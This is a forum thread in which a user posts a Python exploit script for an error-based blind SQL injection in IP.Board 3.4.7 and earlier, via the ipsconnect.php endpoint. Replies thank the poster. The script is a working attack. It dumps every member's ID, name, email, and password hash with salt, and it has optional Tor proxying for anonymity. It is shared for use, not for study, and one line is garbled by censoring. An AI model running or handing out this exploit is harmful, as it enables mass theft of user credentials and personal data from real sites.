Results 1 to 3 of 3
  1. #1
    n4n033's Avatar
    Join Date
    Jan 2010
    Gender
    male
    Location
    Windows
    Posts
    1,090
    Reputation
    43
    Thanks
    2,425
    My Mood
    Cool

    IPBoard Security Exploit

    Hi guys, I found this exploit for IPBoard on the web ( could of be not working on some website cos a patch is out for it ).

    This exploit is linked to IPSConnect.php file.

    Here's the Python Script :

    Code:
    #!/usr/bin/env python
    # Sunday, November 09, 2014 - secthrowaway () safe-mail net
    # IP.Board <= 3.4.7 SQLi (blind, error based); 
    # you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable
    
    url = 'https://target.tld/forum/'
    ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
    
    import sys, re
    
    # <socks> - https://sourceforge.net/projects/socksipy/
    #import socks, socket
    #socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
    #socket.socket = socks.socksocket
    # </socks>
    
    import urllib2, urllib
    
    def inject(sql):
    	try:
    		urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua}))
    	except urllib*****TPError, e:
    		if e.code == 503:
    			data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()
    			txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
    			if txt is not None: 
    				return txt.group(1)
    			sys.exit('Error [3], received unexpected data:\n%s' % data)
    		sys.exit('Error [1]')
    	sys.exit('Error [2]')
    
    def get(name, table, num):
    	sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
    	s = int(inject('LENGTH((%s))' % sqli))
    	if s < 31:
    		return inject(sqli)
    	else:
    		r = ''
    		for i in range(1, s+1, 31):
    			r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
    		return r
    
    n = inject('SELECT COUNT(*) FROM members')
    print '* Found %s users' % n
    for j in range(int(n)):	
    	print get('member_id', 'members', j)
    	print get('name', 'members', j)
    	print get('email', 'members', j)
    	print get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', 'members', j)
    	print '----------------'
    This exploit wasn't created by me, credits to whoever found it.


    The Only Bests :


    R3d_L!n3(Fares)
    Aeroman (Brent)
    TheCamels8 (Ori)


  2. The Following 2 Users Say Thank You to n4n033 For This Useful Post:

    rpice18 (12-14-2014),w4rl0 (12-10-2015)

  3. #2
    rpice18's Avatar
    Join Date
    Dec 2014
    Gender
    male
    Posts
    10
    Reputation
    10
    Thanks
    40
    wow. thanks

  4. #3
    Krizzi's Avatar
    Join Date
    Jan 2015
    Gender
    male
    Posts
    52
    Reputation
    10
    Thanks
    4
    My Mood
    Cold
    Thanks for the exploit :d

Similar Threads

  1. [Tutorial] Leak EXPLOIT! How To Bypass Minecraft Security Questions And Change Password!
    By wallblack in forum Minecraft Tutorials
    Replies: 3
    Last Post: 11-16-2014, 06:18 PM
  2. Req: Torncity hacks/bugs/exploits.
    By dakiddy in forum Hack Requests
    Replies: 39
    Last Post: 06-23-2010, 03:15 PM
  3. New Windows Exploit
    By Dave84311 in forum General
    Replies: 6
    Last Post: 12-31-2009, 05:16 PM
  4. Javascript exploits please :D (tests)
    By Kyojiro in forum General
    Replies: 15
    Last Post: 05-31-2006, 07:12 PM